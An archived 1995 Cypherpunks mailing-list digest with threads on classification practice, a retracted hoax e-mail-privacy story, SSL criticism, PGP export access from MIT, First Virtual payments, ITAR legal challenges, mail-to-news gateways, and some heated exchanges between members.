Subject: Re: what the military does and why (re: cryptography)
In-Reply-To: <9507291535.AA04463@all.net>
Message-ID: <Pine.3.89.9507291333.A17374-0100000@larry>
MIME-Version: 1.0
Content-Type: text/plain



On Sat, 29 Jul 1995, Dr. Frederick B. Cohen wrote:

> some of my writings and look through the citations I use as a basis for
> my opinions.  If you would like a reading list, look under Management
> Analytics in my W3 site:

Doc, how much actual workaday classified traffic have you laid eyes upon?
Never seen a E-2's orders to alcohol-rehabilitation school classified Top 
Secret? Never seen extracts from Janes _Ships of the World_ classified as 
Secret?

Management Analytics. That's what the world needs.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Sat, 29 Jul 95 10:43:24 PDT
To: alanh@infi.net (Alan Horowitz)
Subject: Re: what the military does and why (re: cryptography)
In-Reply-To: <Pine.3.89.9507291333.A17374-0100000@larry>
Message-ID: <9507291737.AA12037@all.net>
MIME-Version: 1.0
Content-Type: text


> Doc, how much actual workaday classified traffic have you laid eyes upon?

I could tell you, but then I'd have to shoot you.

> Never seen a E-2's orders to alcohol-rehabilitation school classified Top 
> Secret?
> Never seen extracts from Janes _Ships of the World_ classified as 
> Secret?

Just because you don't know why they are classified that way doesn't
make the classifications invalid, and furthermore, I don't recall saying
that the DoD is perfect.  What I said was that they can't cost
effectively encrypt all information and that they also have requirements
that may make cryptography inapporpriate in certain circumstances, so
they have policies and perform risk analysis on what to spend money
protecting with cryptography. 

> 
> Management Analytics. That's what the world needs.
> 

Even a monkey eventually types truly wise statements given enough time.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Philip Zimmermann <prz@acm.org>
Date: Sat, 29 Jul 95 13:15:31 PDT
To: cypherpunks@toad.com (Cypherpunks)
Subject: The little sex kitten -- untrue story
Message-ID: <199507292010.UAA10501@maalox>
MIME-Version: 1.0
Content-Type: text


I posted this funny story to cypherpunks earlier today after someone
emailed it to me.  Now I am told the the story is false.  There are no
court records of such a case.  And it apparantly was posted to the net
(maybe to cypherpunks) months ago, and it was shown to be false.  I should
have checked it out before posting it to a public newsgroup.  Sorry about
that.  How embarrassing.  Well, it still has entertainment value, as long
as it's clearly labeled as fiction.

 -Philip Zimmermann

Date: Thu, 27 Jul 1995 13:53:02 -0400
Subject: The little sex kitten

JUDGE RULES ON E-MAIL PRIVACY CASE

TULSA, OKLA -- The Oklahoma Supreme Court has ruled on a case that many
legal experts believe clearly delineates the e-mail privacy rights of
computer users in the workplace.  Judge Stan Musing declared that employees
have a right to expect that their empolyers will refrain from monitoring
e-mail messages transmitted on company systems.  The case went to court
after programmer Augustus Lindsey's supervisor monitored his e-mail and
intercepted a message from Lindsey to a colleague.  The message read:
"That little sex kitten has been driving me wild.  She's moaning and begging
for it every minute.  Last night I was afraid someone would hear, and we'd
be thrown out of the building.  But don't worry -- all is arranged.
Wednesday she gets the knife".  Lindsey's supervisor alerted authorities,
suspecting that a crime was in the making.  Lindsey was arrested on the spot
and spent an uncomfortable night discussing the situation with the police. 
However, he was released in the morning, just in time to get his female 
cat to the vet for spaying.  Lindsey sued his boss for invasion of privacy 
and sought punitive damages as well.

----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chen@intuit.com (Mark Chen)
Date: Sat, 29 Jul 95 14:47:15 PDT
To: perry@imsi.com
Subject: Re: Netscape the Big Win
In-Reply-To: <9507200747.AA15208@snark.imsi.com>
Message-ID: <9507292145.AA29335@doom.intuit.com>
MIME-Version: 1.0
Content-Type: text/plain



> Crypto *is* integrated into Netscape. Unfortunately, the crypto is SSL
> -- a complete waste of time.
> 
> Among other things, SSL only lets you authenticate to X.509
> certificate roots that have been issued straight from the hands of Jim
> Bidzos -- which effectively means that you can secure only connections
> with Netscape commerce servers, and that you cannot authenticate both
> ends of the communications link. Its also just plain bad -- there are
> ugly holes in the security from what I can see. Netscape is, of
> course, pushing it as a standard. Vomit.
> 
> Luckily, Netscape recently hired Tahir El Gammal (did I put too many
> m's there?) and he's a smart guy. Unfortunately, he seems to be in a
> position where he has to defend the fairly bad work they did already.

Still in catch-up mode. . . .

As the person who evaluated Courier for Intuit, I feel compelled to
point out that Intuit does *not* endorse SSL.

I agree with all of Perry's criticisms, and offer a couple of my own:

1) since SSL is a sub-application-level protocol trying to solve an
application-level security problem, it leaves communicating nodes
vulnerable to early-termination attacks.  SSL MACs authenticate
individual SSL records, not application messages.

2) since only fools run http servers on secure network segments,
network admins are faced with the problem of clearing sensitive data
(presumably "protected" on the line by SSL) out of the DMZ in real
time.  This is a pain.

Fortunately, Courier suffers from neither of these infirmities.

   - Mark -


--
Mark Chen 
chen@intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jis@mit.edu (Jeffrey I. Schiller)
Date: Sat, 29 Jul 95 12:09:05 PDT
To: cypherpunks@toad.com
Subject: MIT PGP distribution site accessible from Canada
Message-ID: <ac40379800021004864c@[18.162.1.1]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

MIT PGP distribution site accessible from Canada

July 29, 1995

MIT is pleased to announce that, after consulting with the US State
Office of Defense Trade Controls, we have clarified procedures that
permit us to make our PGP distribution site accessible from Canada.
We would like to thank ODTC for helping us to make this possible.

People in Canada attempting to download PGP from MIT will be required
to assert that they are Canadian citizens and that they are obtaining
the software for end-use in Canada by Canadian citizens, or for return
to the United States.

You can obtain PGP via the World Wide Web at

        http://web.mit.edu/network/pgp.html

You can also obtain PGP via anonymous FTP to net-dist.mit.edu.
Connect to the directory pub/PGP and get and read the README
file.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMBqHC8UtR20Nv5BtAQHYKwP9EOZ+E9ZtX6oRmrstl+JzHUUgMPMZp5by
zOVuBJtPCNPeQekv+A5lJWzaJVxdJePHvvRttbLv3VYH6i5I/TGwoe0zLyiBsl5B
piSkC6ERLRR1052DC6ki8xj7C1SR5LKlhRY8k9fFn7UwkPw6JDNRAPY4Qh+T3vzX
IUZG0XomYMA=
=Yaww
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Sat, 29 Jul 95 12:39:05 PDT
To: aba@atlas.ex.ac.uk
Subject: Re: Zimmerman legal fund
In-Reply-To: <19336.9507291110@exe.dcs.exeter.ac.uk>
Message-ID: <199507291938.PAA08633@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


Adam B wrote:
| Okay, now separate issue, really talking about FV now.  For me, the
| main thing holding me back from using it is that I'm not in the US,
| and don't have a US bank account to open a FV seller acct.  (I would
| have liked to use it as one of the few net payment systems actually up
| and running, as a payment method for the RSA T-shirts, it would have
| been a nice system, allowing me to effectively accept VISA payments
| which I have otherwise been unable to do.)

	Incidentally, the FV terms of service prohibit the sale of
material goods using FV as a payment system.  Its intended for selling
information, not physical products.  This is reflected in the fact
that the seller takes multiple risks of non-payment.

	You could probably get away with selling individualized,
signed tokens redeemable for a t-shirt after 30 days to mitigate your
risk, abide by FV's TOS, and make the buyers happy, but this seems
like a lot of work to use FV.

Adam S


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 29 Jul 95 15:53:23 PDT
To: cypherpunks@toad.com
Subject: Phillip Elmer Dewitt: "I screwed up"
Message-ID: <199507292251.PAA01251@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


there's an interesting debate going on over in alt.internet.media-coverage.
Phillip Elmer Dewitt has been posting a bit on his role in the "Rimm job".
Up until about now he has been very evasive, in denial, and seemingly
deflecting criticism and playing "spin doctor" with his article. 

however, IMHO a breakthrough just happened where below he apologizes, 
although not for anything specific. some on the
newsgroup are pressuring him to (1) run a new time story (2) issue
some kind of retraction or advice to other journalists based on what
he learned from the affair.

I would suggest emailing him and trying to be conciliatory (don't
flame his eyebrows off), but at the same time asking him to 
write something substantial about
his experience that can either be circulated on the internet or
in some other magazine. his experience in the affair, given in
simple bullet-list form, would be immensely valuable to other
reporters and could help "head off at the pass" (press?) many future 
internet-trashing articles. this is a very invaluable opportunity
for cpunks to not merely whine and rant, but to try to influence
the future in a positive way through your input.

also in the newsgroup is an article in which he describes how

1) he had several indications the article made "suspicious" claims
from people, including Mike Godwin of EFF, who he talked to on the phone
about twice or so. he also noticed that it made unsupportable claims,
even the one on the cover that tried to generalize the BBS info
to the Internet realm.

2) he was suspicious of Rimm at a point, particularly after Rimm
refused to elaborate on his background, and called his advisor
and Rimm personally, and Rimm assured him that "nothing in
his background would embarrass him or Time." apparently DeWitt
also had heard about the "casino study".


------- Forwarded Message

From: ped@panix.com (Philip Elmer-DeWitt)
Newsgroups: alt.internet.media-coverage,alt.culture.internet,alt.culture.usenet
Subject: Re: More PEDagogy (was Re: TIME Cover on Cyberporn)
Date: Thu, 27 Jul 1995 19:04:56 -0500


>         Yes, the damage is done.  Even an honest retraction at this 
> point won't alter the public perception that the net is awash in 
> pornography.  But I could honestly tell my students PED deserves 
> respect rather than scorn IF HE'D SWALLOW HIS PRIDE and urge his 
> colleagues to learn from his mistakes.
>         He probably won't.  I'm not sure I could take my own advice 
> were the roles reversed.  But PED, if you can't do what you should,
> at least spare us any more embarrassing rationalizations.    

Good advice. 

I don't know how else to say it, so I'll just repeat what I've said
before. I screwed up. The cover story was my idea, I pushed for it, and it
ran pretty much the way I wrote it. It was my mistake, and my mistake
alone. I do hope other reporters will learn from it. I know I have.

I've also tried to explain how it happened, not to rationalize my
mistakes, but to answer specific questions. I didn't want to seem
unresponsive, and I generally don't mind a little embarassment. But I
think you are right; answering those questions in this forum is only
creating more bad will. If people are genuinely curious about how the
Cyberporn debacle came to be, I will reply to queries in e-mail.

- -- 
Philip Elmer-DeWitt                                   ped@well.com
TIME  Magazine                      http://www.pathfinder.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@panix.com (David Mandl)
Date: Sat, 29 Jul 95 13:02:58 PDT
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: The little sex kitten
Message-ID: <v01530501ac4040bb01c2@[166.84.250.21]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:57 AM 7/29/95, Philip Zimmermann wrote:
>JUDGE RULES ON E-MAIL PRIVACY CASE
>
>TULSA, OKLA -- The Oklahoma Supreme Court has ruled on a case that many
>legal experts believe clearly delineates the e-mail privacy rights of
>computer users in the workplace.  Judge Stan Musing declared that employees
>have a right to expect that their empolyers will refrain from monitoring
>e-mail messages transmitted on company systems.

Far as I can tell, this is meaningless.  If you sign a paper "consenting"
to email monitoring by your employer, they've got a green light, period.
And under those circumstances, I'd think very few companies would be
foolish enough not to just ask you to sign.  So the only ones who have to
worry are those who don't get your "permission" first, and probably more
and more companies will just be more up front about it in the future.

The tightwad, privacy-loathing scumbags I work for sprang just such a
document on us recently, and after squirming and bitching about it for a
while, I actually did sign, simply because I wasn't prepared to lose my job
at that point.  My fear, based on well-established tradition, is that
eventually this will become widespread and more and more employers will
monitor email, with coerced "consent."

   --Dave.

--
Dave Mandl
dmandl@panix.com
http://wfmu.org/~davem






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (UnCensored Girls Anonymous)
Date: Sat, 29 Jul 95 14:18:26 PDT
To: cypherpunks@toad.com
Subject: Financial Latency Was: Zimmerman legal fund
Message-ID: <199507292118.OAA25623@mailhost.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

It isn't only clearing latency that's a problem. FV has already
taken over 5 days to deal with a simple account problem.

Latency might be a Good Thing(tm) in remailers, but it's a
Bad Thing(tm) in financial services. It's a "repuation market"
kinda thing. First Virtual is starting to fall down on many counts.
I'd have paid more if I could have found a place that would have
cleared things faster.

And....inasmuch as these are "real-time" computers we're dealing
with here on the net, bad transacions and fraud can be stopped cold.
Or with only minor losses, at the very most.

Love Always,

Carol Anne


>	Incidentally, the FV terms of service prohibit the sale of
>material goods using FV as a payment system.  Its intended for selling
>information, not physical products.  This is reflected in the fact
>that the seller takes multiple risks of non-payment.
>
>	You could probably get away with selling individualized,
>signed tokens redeemable for a t-shirt after 30 days to mitigate your
>risk, abide by FV's TOS, and make the buyers happy, but this seems
>like a lot of work to use FV.
>
>Adam S
>
>
>-- 
>"It is seldom that liberty of any kind is lost all at once."
>					               -Hume
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMBqlVIrpjEWs1wBlAQEWkwP/Yxu0048VA85SN7kpGbmVfAAikeGaaEgH
6vJ1CwUpfSdQC99MamNDooXW7YWISK+M42WWPrcUaCLQDa9U4ww45Rgx7SheONcm
k/YbGOuc7rpHxrUJ4TB11y4qC6qA4fh0Ogeju1Xl4Rp7RifGgQ6pON9KfqpZhFl/
qEsj/oBlo50=
=8ZAD
-----END PGP SIGNATURE-----
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sat, 29 Jul 95 16:25:12 PDT
To: "Christopher E. Stefan" <dc-stuff@fc.net>
Subject: Re: CDT report on Senate and House hearings on Online Pornography
Message-ID: <199507292324.QAA24490@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


Crypto relevance:  Absolutely none.


At 03:52 PM 7/28/95 -0700, Christopher E. Stefan wrote:
> Somewhat interesting it seems, an ultra-conservative House is the First
> Amendment's bigest friend on the [...]

If ultra conservatives are folk who only increase school lunch 
funding by 4.5% (reducing the planned increase by 0.8%), who 
reduce the marriage penalty by $500, reduce government 
controlled broadcasting by 8%, and so forth,


What then would you call people who would reduce the marriage 
penalty by $4000, abolish school lunch funding, and end 
government controlled broadcasting.

Lunatic fringe ultra Nazis?

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Crypto Defender <crypto@shaq.midex.com>
Date: Sat, 29 Jul 95 09:02:14 PDT
To: cypherpunks@toad.com
Subject: Legal Crypto Bullshit and Lawyers reluctance
Message-ID: <Pine.3.89.9507291720.B9814-0100000@shaq.midex.com>
MIME-Version: 1.0
Content-Type: text/plain


Actually I am a lawyer...hehe...

With the recent talk and action regarding the hooks for crypto in certain 
very valuable (or at least of increasing value) programs available on the 
net and elsewhere I find myself getting increasingly angry about the 
discourse and especially the arrogance of the parties involved.

As a lawyer, I often send demand letters first in cases where the chances 
of winning a case in court are small and the ability for my client to 
withstand extended billing is low.  In short, I send these letters as a 
weak effort backed up by little intent on pursuing the case (NOTE: I did 
not say no intent, I often do pursue cases with little or no money in 
them, and that explains why my school loans are not paid off 8-).

What I am saying is that these demand letters that are being sent, 
especially regarding tenuous positions such as programs with crypto hooks 
are ITAR restricted, are causing more damage then they need to.  I am not 
suggesting that Wei distribute his libraries and bare the brunt of 
prosecution.  But I am certain there are bigger institutional players out 
there that can.  I can not say we would take the case without obviously 
speaking with our management committee at my firm, but we often take on 
cases that will lose us money if they break into new areas of the law.

Someone must be on this list whom in good faith, honestly believes that 
the ITAR restrictions dont apply to every piece of software on the net.  
While I can not and am not advocating breaking the law, nor am I 
soliciting business because I am sending to a general email list, If 
someone is interested in a challenge other than Phil Zimmerman's let me 
know.  I also will not pursue anything without the relevant author's 
permission, obviously.  I am not intending to get people in trouble 
here.  I just feel that their stance on the law is weak at best and feel 
there has to be someone out there willing to take the chance.

Matt Miszewski
Attorney at Law
matt@midex.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Sat, 29 Jul 95 02:58:56 PDT
To: cypherpunks@toad.com
Subject: More about HTTP proxying: Harvest cache
Message-ID: <Pine.LNX.3.91.950729174802.874A-100000@ima.net>
MIME-Version: 1.0
Content-Type: text/plain


Hal and others interested in HTTP proxying: I've just found an interesting 
alternative to CERN httpd at http://excalibur.usc.edu/ . I haven't yet 
played with it, but it looks promising. Caching should also play a useful 
role defeating traffic analysis, besides increasing the throughput.

[...]
  HIERARCHY

   The Harvest cache implements hierarchical caching: your cache at home
   can resolve URLs through your lab cache, which in turn can resolve
   requests through your institutional cache, which in turn can resolve
   requests through your regional network cache. The cache resolution
   algorithm, at each stage in the hierarchy, distinguishes parents from
   neighbor caches. A parent cache is a cache higher up the hierarchy,
   while a neighbor cache is one at the same level in the hierarchy.
[...]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Sat, 29 Jul 95 15:46:28 PDT
To: carolab@censored.org
Subject: Re: Set phone permit "wire" taps
Message-ID: <9507292245.AA09763@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>I've been arrested too amy times, an done enough local, state, and
>federal time to know.

Prove it.  Please post one date and location of incarceration as well
as an identifying number.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kdf@gigo.com (John Erland)
Date: Sat, 29 Jul 95 19:16:04 PDT
To: cypherpunks@toad.com
Subject: Mail2news Gates
Message-ID: <4f6_9507291907@gigo.com>
MIME-Version: 1.0
Content-Type: text/plain



futplex@pseudonym.com wrote in a message to John Erland:

fp> John Erland writes:
> Can someone send me a list of functioning mail-2-news gates?

fp> You asked this before (on June 4) and I answered (on June
fp> 21), but I take it you weren't reading the list then.

I specifically mentioned that I had but intermittant access to the list, but I
believe I got the answer netmail.  Unfortunately, it is already outdated, which
is why I am asking again.

fp> Briefly, Matt Ghio's list is the only publicly announced
fp> list I've found -- the pertinent Usenet FAQs point solely to
fp> his list. mailto:mg5n+remailers@andrew.cmu.edu for the
fp> current list. 

Coolio.  Just the thing!

fp> I don't know how much Matt's been updating it, but I have
fp> yet to find an alternative.

I hope he does it fairly frequently, as these gates seem to have a half-life of
about fifteen minutes.  @news.demon.co.uk was one of the old standbys that
seemed to be stable, but it appears to have locked us all out now.

Thanks for the address!

--- timEd 1.01
--
: Fidonet:  John Erland 1:203/8055.12  .. speaking for only myself.
: Internet: kdf@gigo.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (UnCensored Girls Anonymous)
Date: Sat, 29 Jul 95 17:22:01 PDT
To: cypherpunks@toad.com
Subject: Re: Set phone permit "wire" taps
Message-ID: <199507300021.RAA26436@mailhost.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


21445-175


>>I've been arrested too amy times, an done enough local, state, and
>>federal time to know.
>
>Prove it.  Please post one date and location of incarceration as well
>as an identifying number.
>	/r$
>
>
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (UnCensored Girls Anonymous)
Date: Sat, 29 Jul 95 17:25:20 PDT
To: Rich Salz <rsalz@osf.org>
Subject: Re: Set phone permit "wire" taps
Message-ID: <199507300025.RAA26885@mailhost.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Federal
Now SHOW ME something.
You sure question a lotta credentials,
like you've REALLY been somewhere or done something.

Love Always,

Carol Anme

>>I've been arrested too amy times, an done enough local, state, and
>>federal time to know.
>
>Prove it.  Please post one date and location of incarceration as well
>as an identifying number.
>	/r$
>
>
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (UnCensored Girls Anonymous)
Date: Sat, 29 Jul 95 17:38:05 PDT
To: cypherpunks@toad.com
Subject: Re: Financial Latency Was: Zimmerman legal fund
Message-ID: <199507300037.RAA28696@mailhost.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


As long as ya wanna deal with 'who' rather than what,
anything I post is irrelevant.
And the reality of realtime cash conversion isn't pretty.

And it makes no difference if it's Netcash, FV, CheckExpress
or whomever it is. FV just happened to be there. It's kind of
an illustrated example, for if I was really bitching, I'd cancel
my account with them, tack it on my .sig, and post it all over usenet.

For if you could sell shirts easily, you would. you aren't.
Latency problems in cash conversion is still why.

Love Always,

Carol Anne
ps methinks it's that heatwave that's got you.
>
>UnCensored Girls Anonymous writes:
>> It isn't only clearing latency that's a problem. FV has already
>> taken over 5 days to deal with a simple account problem.
>
>Thank you, but this is *not* the First Virtual Bitchline. This is
>Cypherpunks. Please take this elsewhere.
>
>Perry
>
>
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <erc@khijol.intele.net>
Date: Sat, 29 Jul 95 18:48:51 PDT
To: David Mandl <dmandl@panix.com>
Subject: Re: The little sex kitten
In-Reply-To: <v01530501ac4040bb01c2@[166.84.250.21]>
Message-ID: <Pine.3.89.9507291922.A25503-0100000@khijol>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 29 Jul 1995, David Mandl wrote:

> The tightwad, privacy-loathing scumbags I work for sprang just such a
> document on us recently, and after squirming and bitching about it for a
> while, I actually did sign, simply because I wasn't prepared to lose my job
> at that point.  My fear, based on well-established tradition, is that
> eventually this will become widespread and more and more employers will
> monitor email, with coerced "consent."

That's OK - just use PGP :)
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <erc@khijol.intele.net>
Date: Sat, 29 Jul 95 18:53:41 PDT
To: UnCensored Girls Anonymous <carolann@censored.org>
Subject: Re: Set phone permit "wire" taps
In-Reply-To: <199507300025.RAA26885@mailhost.primenet.com>
Message-ID: <Pine.3.89.9507291902.B25503-0100000@khijol>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 29 Jul 1995, UnCensored Girls Anonymous wrote:

> Federal
> Now SHOW ME something.
> You sure question a lotta credentials,
> like you've REALLY been somewhere or done something.

Oh, he has.  He could tell you, but then he'd have to kill you ;)
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Sat, 29 Jul 95 16:51:19 PDT
To: carolann@censored.org (UnCensored Girls Anonymous)
Subject: Re: Financial Latency Was: Zimmerman legal fund
In-Reply-To: <199507292118.OAA25623@mailhost.primenet.com>
Message-ID: <199507292351.TAA12568@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



UnCensored Girls Anonymous writes:
> It isn't only clearing latency that's a problem. FV has already
> taken over 5 days to deal with a simple account problem.

Thank you, but this is *not* the First Virtual Bitchline. This is
Cypherpunks. Please take this elsewhere.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Sat, 29 Jul 95 17:54:19 PDT
To: carolann@censored.org (UnCensored Girls Anonymous)
Subject: Re: Financial Latency Was: Zimmerman legal fund
In-Reply-To: <199507300037.RAA28696@mailhost.primenet.com>
Message-ID: <199507300054.UAA18561@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Let me be perfectly clear.

I have no idea who or what you are. You post constant streams of
unparseable garbage (presumably produced by your very own wetware
rather than a random string generator but its hard to tell) to this
mailing list. So long as the stuff bears some passing resemblance to
discussion of cryptography, well, its not up to me to criticize you
just for being incomprehensable.  

However, it appears that you have some sort of weird problem with
First Virtual that you don't have the common sense to resolve in
private. Please deal with it privately. Its possible that I'm wrong
and that you are discussing cryptography, but as your english prose is
completely indecipherable to this cryptographer there is no way
whatsoever to know, which makes it as good as irrelevant.

Perry

PS If your postings are in fact some sort of weird stegonographic
cover for some meaningful message, which is one possible (unlikely)
explanation for them, I would suggest posting them to alt.test
instead.

UnCensored Girls Anonymous writes:
> As long as ya wanna deal with 'who' rather than what,
> anything I post is irrelevant.
> And the reality of realtime cash conversion isn't pretty.
> 
> And it makes no difference if it's Netcash, FV, CheckExpress
> or whomever it is. FV just happened to be there. It's kind of
> an illustrated example, for if I was really bitching, I'd cancel
> my account with them, tack it on my .sig, and post it all over usenet.
> 
> For if you could sell shirts easily, you would. you aren't.
> Latency problems in cash conversion is still why.
> 
> Love Always,
> 
> Carol Anne
> ps methinks it's that heatwave that's got you.
> >
> >UnCensored Girls Anonymous writes:
> >> It isn't only clearing latency that's a problem. FV has already
> >> taken over 5 days to deal with a simple account problem.
> >
> >Thank you, but this is *not* the First Virtual Bitchline. This is
> >Cypherpunks. Please take this elsewhere.
> >
> >Perry
> >
> >
> --
> 
> Member Internet Society  - Certified BETSI Programmer  -  Webmistress
> ***********************************************************************
> Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
> My Homepage
> The Cyberdoc
> ***********************************************************************
> ------------------ PGP.ZIP Part [017/713] -------------------
> M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
> MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
> MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
> -------------------------------------------------------------
> for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sat, 29 Jul 95 18:33:03 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Mail2news Gates
In-Reply-To: <9507300108.AA00621@mtjava.llnl.gov>
Message-ID: <199507300131.VAA24713@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


John Erland writes:
> Can someone send me a list of functioning mail-2-news gates?

You asked this before (on June 4) and I answered (on June 21), but I take it
you weren't reading the list then.  Briefly, Matt Ghio's list is the only
publicly announced list I've found -- the pertinent Usenet FAQs point solely
to his list. mailto:mg5n+remailers@andrew.cmu.edu for the current list.

I don't know how much Matt's been updating it, but I have yet to find an
alternative.

My previous reply may be found at http://www.hks.net/cpunks/cpunks-15/1567.html

[...]
